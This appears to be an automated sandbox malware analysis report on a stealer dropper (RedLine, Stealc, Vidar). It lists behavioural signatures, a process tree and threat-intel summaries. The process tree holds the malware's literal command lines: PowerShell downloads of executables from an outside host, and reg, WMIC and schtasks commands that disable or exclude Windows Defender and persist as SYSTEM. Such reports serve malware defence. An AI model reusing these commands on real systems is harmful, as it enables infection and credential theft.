Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1432200
MD5:	705685a8deace858e7fc849471c045f3
SHA1:	10132365b465a6f231c8e292f462c2d005b4f9b0
SHA256:	7ff9182009a077962d7c00b287caaa60fe7888e5d6cf6018c14f967a2441a3f9
Tags:	exe
Infos:

Detection

Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Benign windows process drops PE files

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Sigma detected: Set custom UserAgent and download file via Powershell

Snort IDS alert for network traffic

Yara detected AntiVM3

Yara detected Mars stealer

Yara detected PureLog Stealer

Yara detected RedLine Stealer

Yara detected SectopRAT

Yara detected Stealc

Yara detected UAC Bypass using CMSTP

Yara detected Vidar stealer

Yara detected zgRAT

C2 URLs / IPs found in malware configuration

Checks if the current machine is a virtual machine (disk enumeration)

Connects to many ports of the same IP (likely port scanning)

Creates files in the recycle bin to hide itself

Found direct / indirect Syscall (likely to bypass EDR)

Found evasive API chain (may stop execution after checking locale)

Found hidden mapped module (file has been removed from disk)

Found many strings related to Crypto-Wallets (likely being stolen)

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies Group Policy settings

Modifies Windows Defender protection settings

Performs DNS queries to domains with low reputation

Powershell drops PE file

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Sigma detected: Potentially Suspicious PowerShell Child Processes

Sigma detected: PowerShell DownloadFile

Sigma detected: Powerup Write Hijack DLL

Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder

Suspicious powershell command line found

Tries to download and execute files (via powershell)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Uses cmd line tools excessively to alter registry or file data

Uses schtasks.exe or at.exe to add and modify task schedules

Very long command line found

Writes to foreign memory regions

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Creates job files (autostart)

Creates or modifies windows services

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found decision node followed by non-executed suspicious APIs

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries information about the installed CPU (vendor, model number etc)

Queries keyboard layouts

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: PowerShell Download Pattern

Sigma detected: PowerShell Web Download

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: Suspicious desktop.ini Action

Sigma detected: Usage Of Web Request Commands And Cmdlets

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 1900 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 705685A8DEACE858E7FC849471C045F3)

cmd.exe (PID: 1048 cmdline: "cmd" /c "C:\Users\user\AppData\Local\Temp\nsvE79C.tmp\lood.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5428 cmdline: powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/th.php?c=1000','stat')" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

powershell.exe (PID: 5268 cmdline: powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

WerFault.exe (PID: 5560 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 3808 -ip 3808 MD5: C31336C1EFC2CCB44B4326EA793040F2)

i1.exe (PID: 3808 cmdline: i1.exe /SUB=2838 /str=one MD5: 22B610EEDBB3591F31508E1912ED5B01)

u2xs.0.exe (PID: 5788 cmdline: "C:\Users\user\AppData\Local\Temp\u2xs.0.exe" MD5: BE531DFDB40E97826D86E1FB73FA73C8)

run.exe (PID: 4820 cmdline: "C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe" MD5: 9FB4770CED09AAE3B437C1C6EB6D7334)

cmd.exe (PID: 5616 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

MSBuild.exe (PID: 5860 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

u2xs.3.exe (PID: 6972 cmdline: "C:\Users\user\AppData\Local\Temp\u2xs.3.exe" MD5: 397926927BCA55BE4A77839B1C44DE6E)

WerFault.exe (PID: 5560 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3808 -s 1936 MD5: C31336C1EFC2CCB44B4326EA793040F2)

powershell.exe (PID: 6980 cmdline: powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=444', 'i2.bat')" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

powershell.exe (PID: 6188 cmdline: powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=456','i3.exe')" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

i3.exe (PID: 4088 cmdline: i3.exe MD5: DA30CEE1E6389704275CA7868FC7AD1F)

Install.exe (PID: 6036 cmdline: .\Install.exe /Bdidlg "385128" /S MD5: 90487EB500021DBCB9443A2CF972A204)

cmd.exe (PID: 1888 cmdline: "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

forfiles.exe (PID: 7416 cmdline: forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" MD5: D95C443851F70F77427B3183B1619DD3)

cmd.exe (PID: 7440 cmdline: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

reg.exe (PID: 7456 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

forfiles.exe (PID: 7532 cmdline: forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" MD5: D95C443851F70F77427B3183B1619DD3)

cmd.exe (PID: 7560 cmdline: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

reg.exe (PID: 7576 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6 MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

forfiles.exe (PID: 7888 cmdline: forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" MD5: D95C443851F70F77427B3183B1619DD3)

cmd.exe (PID: 7900 cmdline: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

reg.exe (PID: 7920 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6 MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

forfiles.exe (PID: 8004 cmdline: forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" MD5: D95C443851F70F77427B3183B1619DD3)

cmd.exe (PID: 8036 cmdline: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

reg.exe (PID: 8060 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6 MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

forfiles.exe (PID: 8156 cmdline: forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force" MD5: D95C443851F70F77427B3183B1619DD3)

cmd.exe (PID: 8184 cmdline: /C powershell start-process -WindowStyle Hidden gpupdate.exe /force MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

powershell.exe (PID: 1520 cmdline: powershell start-process -WindowStyle Hidden gpupdate.exe /force MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

gpupdate.exe (PID: 8052 cmdline: "C:\Windows\system32\gpupdate.exe" /force MD5: 6DC3720EA74B49C8ED64ACA3E0162AC8)

conhost.exe (PID: 5744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

forfiles.exe (PID: 7948 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True" MD5: D95C443851F70F77427B3183B1619DD3)

conhost.exe (PID: 7956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7996 cmdline: /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

powershell.exe (PID: 8028 cmdline: powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

WMIC.exe (PID: 8148 cmdline: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True MD5: E2DE6500DE1148C7F6027AD50AC8B891)

WmiPrvSE.exe (PID: 7564 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 7568 cmdline: schtasks /CREATE /TN "biPxHmULFllsbMgnpt" /SC once /ST 17:12:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe\" Wt /gCsdidCeBm 385128 /S" /V1 /F MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

forfiles.exe (PID: 356 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn biPxHmULFllsbMgnpt" MD5: D95C443851F70F77427B3183B1619DD3)

conhost.exe (PID: 7536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7920 cmdline: /C schtasks /run /I /tn biPxHmULFllsbMgnpt MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

schtasks.exe (PID: 920 cmdline: schtasks /run /I /tn biPxHmULFllsbMgnpt MD5: 48C2FE20575769DE916F48EF0676A965)

chrome.exe (PID: 4416 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:/// MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6252 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 --field-trial-handle=2200,i,17811840805501722127,12993279827100568495,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

svchost.exe (PID: 5548 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

Install.exe (PID: 1504 cmdline: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe Wt /gCsdidCeBm 385128 /S MD5: 90487EB500021DBCB9443A2CF972A204)

cmd.exe (PID: 7464 cmdline: "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

forfiles.exe (PID: 2380 cmdline: forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" MD5: D95C443851F70F77427B3183B1619DD3)

cmd.exe (PID: 1868 cmdline: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

reg.exe (PID: 3848 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

powershell.exe (PID: 1020 cmdline: powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Install.exe (PID: 7456 cmdline: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe Wt /gCsdidCeBm 385128 /S MD5: 90487EB500021DBCB9443A2CF972A204)

cmd.exe (PID: 3416 cmdline: "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

forfiles.exe (PID: 760 cmdline: forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" MD5: D95C443851F70F77427B3183B1619DD3)

cmd.exe (PID: 5232 cmdline: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

reg.exe (PID: 6696 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

run.exe (PID: 5664 cmdline: "C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe" MD5: 9FB4770CED09AAE3B437C1C6EB6D7334)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Name	Description	Attribution	Blogpost URLs	Link
